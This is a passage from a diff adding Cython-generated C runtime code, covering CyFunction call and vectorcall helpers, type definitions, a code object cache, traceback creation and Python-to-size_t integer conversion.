} +#endif + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + Py_ssize_t argc; + PyObject *new_args; + PyObject *self; + argc = PyTuple_GET_SIZE(args); + new_args = PyTuple_GetSlice(args, 1, argc); + if (unlikely(!new_args)) + return NULL; + self = PyTuple_GetItem(args, 0); + if (unlikely(!self)) { + Py_DECREF(new_args); +#if PY_MAJOR_VERSION > 2 + PyErr_Format(PyExc_TypeError, + "unbound method %.200S() needs an argument", + cyfunc->func_qualname); +#else + PyErr_SetString(PyExc_TypeError, + "unbound method needs an argument"); +#endif + return NULL; + } + result = __Pyx_CyFunction_CallMethod(func, self, new_args, kw); + Py_DECREF(new_args); + } else { + result = __Pyx_CyFunction_Call(func, args, kw); + } + return result; +} +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE int __Pyx_CyFunction_Vectorcall_CheckArgs(__pyx_CyFunctionObject *cyfunc, Py_ssize_t nargs, PyObject *kwnames) +{ + int ret = 0; + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + if (unlikely(nargs < 1)) { + PyErr_Format(PyExc_TypeError, "%.200s() needs an argument", + ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + ret = 1; + } + if (unlikely(kwnames) && unlikely(PyTuple_GET_SIZE(kwnames))) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no keyword arguments", ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + return ret; +} +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 0)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, NULL); +} +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 1)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, args[0]); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((_PyCFunctionFastWithKeywords)(void(*)(void))def->ml_meth)(self, args, nargs, kwnames); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; + PyTypeObject *cls = (PyTypeObject *) __Pyx_CyFunction_GetClassObj(cyfunc); +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((__Pyx_PyCMethod)(void(*)(void))def->ml_meth)(self, cls, args, (size_t)nargs, kwnames); +} +#endif +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_CyFunctionType_slots[] = { + {Py_tp_dealloc, (void *)__Pyx_CyFunction_dealloc}, + {Py_tp_repr, (void *)__Pyx_CyFunction_repr}, + {Py_tp_call, (void *)__Pyx_CyFunction_CallAsMethod}, + {Py_tp_traverse, (void *)__Pyx_CyFunction_traverse}, + {Py_tp_clear, (void *)__Pyx_CyFunction_clear}, + {Py_tp_methods, (void *)__pyx_CyFunction_methods}, + {Py_tp_members, (void *)__pyx_CyFunction_members}, + {Py_tp_getset, (void *)__pyx_CyFunction_getsets}, + {Py_tp_descr_get, (void *)__Pyx_PyMethod_New}, + {0, 0}, +}; +static PyType_Spec __pyx_CyFunctionType_spec = { + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#if (defined(_Py_TPFLAGS_HAVE_VECTORCALL) && CYTHON_METH_FASTCALL) + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + __pyx_CyFunctionType_slots +}; +#else +static PyTypeObject __pyx_CyFunctionType_type = { + PyVarObject_HEAD_INIT(0, 0) + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, + (destructor) __Pyx_CyFunction_dealloc, +#if !CYTHON_METH_FASTCALL + 0, +#elif CYTHON_BACKPORT_VECTORCALL + (printfunc)offsetof(__pyx_CyFunctionObject, func_vectorcall), +#else + offsetof(PyCFunctionObject, vectorcall), +#endif + 0, + 0, +#if PY_MAJOR_VERSION < 3 + 0, +#else + 0, +#endif + (reprfunc) __Pyx_CyFunction_repr, + 0, + 0, + 0, + 0, + __Pyx_CyFunction_CallAsMethod, + 0, + 0, + 0, + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#ifdef _Py_TPFLAGS_HAVE_VECTORCALL + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + 0, + (traverseproc) __Pyx_CyFunction_traverse, + (inquiry) __Pyx_CyFunction_clear, + 0, +#if PY_VERSION_HEX < 0x030500A0 + offsetof(__pyx_CyFunctionObject, func_weakreflist), +#else + offsetof(PyCFunctionObject, m_weakreflist), +#endif + 0, + 0, + __pyx_CyFunction_methods, + __pyx_CyFunction_members, + __pyx_CyFunction_getsets, + 0, + 0, + __Pyx_PyMethod_New, + 0, + offsetof(__pyx_CyFunctionObject, func_dict), + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, +#if PY_VERSION_HEX >= 0x030400a1 + 0, +#endif +#if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, +#endif +#if __PYX_NEED_TP_PRINT_SLOT + 0, +#endif +#if PY_VERSION_HEX >= 0x030C0000 + 0, +#endif +#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, +#endif +}; +#endif +static int __pyx_CyFunction_init(PyObject *module) { +#if CYTHON_USE_TYPE_SPECS + __pyx_CyFunctionType = __Pyx_FetchCommonTypeFromSpec(module, &__pyx_CyFunctionType_spec, NULL); +#else + CYTHON_UNUSED_VAR(module); + __pyx_CyFunctionType = __Pyx_FetchCommonType(&__pyx_CyFunctionType_type); +#endif + if (unlikely(__pyx_CyFunctionType == NULL)) { + return -1; + } + return 0; +} +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *func, size_t size, int pyobjects) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults = PyObject_Malloc(size); + if (unlikely(!m->defaults)) + return PyErr_NoMemory(); + memset(m->defaults, 0, size); + m->defaults_pyobjects = pyobjects; + m->defaults_size = size; + return m->defaults; +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *func, PyObject *tuple) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_tuple = tuple; + Py_INCREF(tuple); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_kwdict = dict; + Py_INCREF(dict); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->func_annotations = dict; + Py_INCREF(dict); +} + +/* CythonFunction */ +static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyObject *op = __Pyx_CyFunction_Init( + PyObject_GC_New(__pyx_CyFunctionObject, __pyx_CyFunctionType), + ml, flags, qualname, closure, module, globals, code + ); + if (likely(op)) { + PyObject_GC_Track(op); + } + return op; +} + +/* CLineInTraceback */ +#ifndef CYTHON_CLINE_IN_TRACEBACK +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line) { + PyObject *use_cline; + PyObject *ptype, *pvalue, *ptraceback; +#if CYTHON_COMPILING_IN_CPYTHON + PyObject **cython_runtime_dict; +#endif + CYTHON_MAYBE_UNUSED_VAR(tstate); + if (unlikely(!__pyx_cython_runtime)) { + return c_line; + } + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); +#if CYTHON_COMPILING_IN_CPYTHON + cython_runtime_dict = _PyObject_GetDictPtr(__pyx_cython_runtime); + if (likely(cython_runtime_dict)) { + __PYX_PY_DICT_LOOKUP_IF_MODIFIED( + use_cline, *cython_runtime_dict, + __Pyx_PyDict_GetItemStr(*cython_runtime_dict, __pyx_n_s_cline_in_traceback)) + } else +#endif + { + PyObject *use_cline_obj = __Pyx_PyObject_GetAttrStrNoError(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback); + if (use_cline_obj) { + use_cline = PyObject_Not(use_cline_obj) ? Py_False : Py_True; + Py_DECREF(use_cline_obj); + } else { + PyErr_Clear(); + use_cline = NULL; + } + } + if (!use_cline) { + c_line = 0; + (void) PyObject_SetAttr(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback, Py_False); + } + else if (use_cline == Py_False || (use_cline != Py_True && PyObject_Not(use_cline) != 0)) { + c_line = 0; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + return c_line; +} +#endif + +/* CodeObjectCache */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line) { + int start = 0, mid = 0, end = count - 1; + if (end >= 0 && code_line > entries[end].code_line) { + return count; + } + while (start < end) { + mid = start + (end - start) / 2; + if (code_line < entries[mid].code_line) { + end = mid; + } else if (code_line > entries[mid].code_line) { + start = mid + 1; + } else { + return mid; + } + } + if (code_line <= entries[mid].code_line) { + return mid; + } else { + return mid + 1; + } +} +static PyCodeObject *__pyx_find_code_object(int code_line) { + PyCodeObject* code_object; + int pos; + if (unlikely(!code_line) || unlikely(!__pyx_code_cache.entries)) { + return NULL; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if (unlikely(pos >= __pyx_code_cache.count) || unlikely(__pyx_code_cache.entries[pos].code_line != code_line)) { + return NULL; + } + code_object = __pyx_code_cache.entries[pos].code_object; + Py_INCREF(code_object); + return code_object; +} +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object) { + int pos, i; + __Pyx_CodeObjectCacheEntry* entries = __pyx_code_cache.entries; + if (unlikely(!code_line)) { + return; + } + if (unlikely(!entries)) { + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Malloc(64*sizeof(__Pyx_CodeObjectCacheEntry)); + if (likely(entries)) { + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = 64; + __pyx_code_cache.count = 1; + entries[0].code_line = code_line; + entries[0].code_object = code_object; + Py_INCREF(code_object); + } + return; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if ((pos < __pyx_code_cache.count) && unlikely(__pyx_code_cache.entries[pos].code_line == code_line)) { + PyCodeObject* tmp = entries[pos].code_object; + entries[pos].code_object = code_object; + Py_DECREF(tmp); + return; + } + if (__pyx_code_cache.count == __pyx_code_cache.max_count) { + int new_max = __pyx_code_cache.max_count + 64; + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Realloc( + __pyx_code_cache.entries, ((size_t)new_max) * sizeof(__Pyx_CodeObjectCacheEntry)); + if (unlikely(!entries)) { + return; + } + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = new_max; + } + for (i=__pyx_code_cache.count; i>pos; i--) { + entries[i] = entries[i-1]; + } + entries[pos].code_line = code_line; + entries[pos].code_object = code_object; + __pyx_code_cache.count++; + Py_INCREF(code_object); +} +#endif + +/* AddTraceback */ +#include "compile.h" +#include "frameobject.h" +#include "traceback.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + if (c_line) { + (void) __pyx_cfilenm; + (void) __Pyx_CLineForTraceback(__Pyx_PyThreadState_Current, c_line); + } + _PyTraceback_Add(funcname, filename, py_line); +} +#else +static PyCodeObject* __Pyx_CreateCodeObjectForTraceback( + const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = NULL; + PyObject *py_funcname = NULL; + #if PY_MAJOR_VERSION < 3 + PyObject *py_srcfile = NULL; + py_srcfile = PyString_FromString(filename); + if (!py_srcfile) goto bad; + #endif + if (c_line) { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + #else + py_funcname = PyUnicode_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + funcname = PyUnicode_AsUTF8(py_funcname); + if (!funcname) goto bad; + #endif + } + else { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromString(funcname); + if (!py_funcname) goto bad; + #endif + } + #if PY_MAJOR_VERSION < 3 + py_code = __Pyx_PyCode_New( + 0, + 0, + 0, + 0, + 0, + 0, + __pyx_empty_bytes, /*PyObject *code,*/ + __pyx_empty_tuple, /*PyObject *consts,*/ + __pyx_empty_tuple, /*PyObject *names,*/ + __pyx_empty_tuple, /*PyObject *varnames,*/ + __pyx_empty_tuple, /*PyObject *freevars,*/ + __pyx_empty_tuple, /*PyObject *cellvars,*/ + py_srcfile, /*PyObject *filename,*/ + py_funcname, /*PyObject *name,*/ + py_line, + __pyx_empty_bytes /*PyObject *lnotab*/ + ); + Py_DECREF(py_srcfile); + #else + py_code = PyCode_NewEmpty(filename, funcname, py_line); + #endif + Py_XDECREF(py_funcname); // XDECREF since it's only set on Py3 if cline + return py_code; +bad: + Py_XDECREF(py_funcname); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(py_srcfile); + #endif + return NULL; +} +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = 0; + PyFrameObject *py_frame = 0; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject *ptype, *pvalue, *ptraceback; + if (c_line) { + c_line = __Pyx_CLineForTraceback(tstate, c_line); + } + py_code = __pyx_find_code_object(c_line ? -c_line : py_line); + if (!py_code) { + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); + py_code = __Pyx_CreateCodeObjectForTraceback( + funcname, c_line, py_line, filename); + if (!py_code) { + /* If the code object creation fails, then we should clear the + fetched exception references and propagate the new exception */ + Py_XDECREF(ptype); + Py_XDECREF(pvalue); + Py_XDECREF(ptraceback); + goto bad; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + __pyx_insert_code_object(c_line ? -c_line : py_line, py_code); + } + py_frame = PyFrame_New( + tstate, /*PyThreadState *tstate,*/ + py_code, /*PyCodeObject *code,*/ + __pyx_d, /*PyObject *globals,*/ + 0 /*PyObject *locals*/ + ); + if (!py_frame) goto bad; + __Pyx_PyFrame_SetLineNumber(py_frame, py_line); + PyTraceBack_Here(py_frame); +bad: + Py_XDECREF(py_code); + Py_XDECREF(py_frame); +} +#endif + +/* CIntFromPyVerify */ +#define __PYX_VERIFY_RETURN_INT(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 0) +#define __PYX_VERIFY_RETURN_INT_EXC(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 1) +#define __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, exc)\ + {\ + func_type value = func_value;\ + if (sizeof(target_type) < sizeof(func_type)) {\ + if (unlikely(value != (func_type) (target_type) value)) {\ + func_type zero = 0;\ + if (exc && unlikely(value == (func_type)-1 && PyErr_Occurred()))\ + return (target_type) -1;\ + if (is_unsigned && unlikely(value < zero))\ + goto raise_neg_overflow;\ + else\ + goto raise_overflow;\ + }\ + }\ + return (target_type) value;\ + } + +/* CIntFromPy */ +static CYTHON_INLINE size_t __Pyx_PyInt_As_size_t(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const size_t neg_one = (size_t) -1, const_zero = (size_t) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(size_t) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(size_t, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (size_t) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(size_t, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(size_t) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) >= 2 * PyLong_SHIFT)) { + return (size_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(size_t) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) >= 3 * PyLong_SHIFT)) { + return (size_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(size_t) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) >= 4 * PyLong_SHIFT)) { + return (size_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (size_t) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(size_t) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(size_t) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(size_t, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(size_t) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 2 * PyLong_SHIFT)) { + return (size_t) (((size_t)-1)*(((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(size_t) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 2 * PyLong_SHIFT)) { + return (size_t) ((((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(size_t) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 3 * PyLong_SHIFT)) { + return (size_t) (((size_t)-1)*(((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(size_t) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 3 * PyLong_SHIFT)) { + return (size_t) ((((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(size_t) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 4 * PyLong_SHIFT)) { + return (size_t) (((size_t)-1)*(((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(size_t) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 4 * PyLong_SHIFT)) { + return (size_t) ((((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(size_t) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(size_t) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + size_t val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (size_t) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (size_t) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (size_t) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (size_t) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (size_t) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(size_t) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((size_t) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(size_t) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((size_t) idigit) << bits; + #if 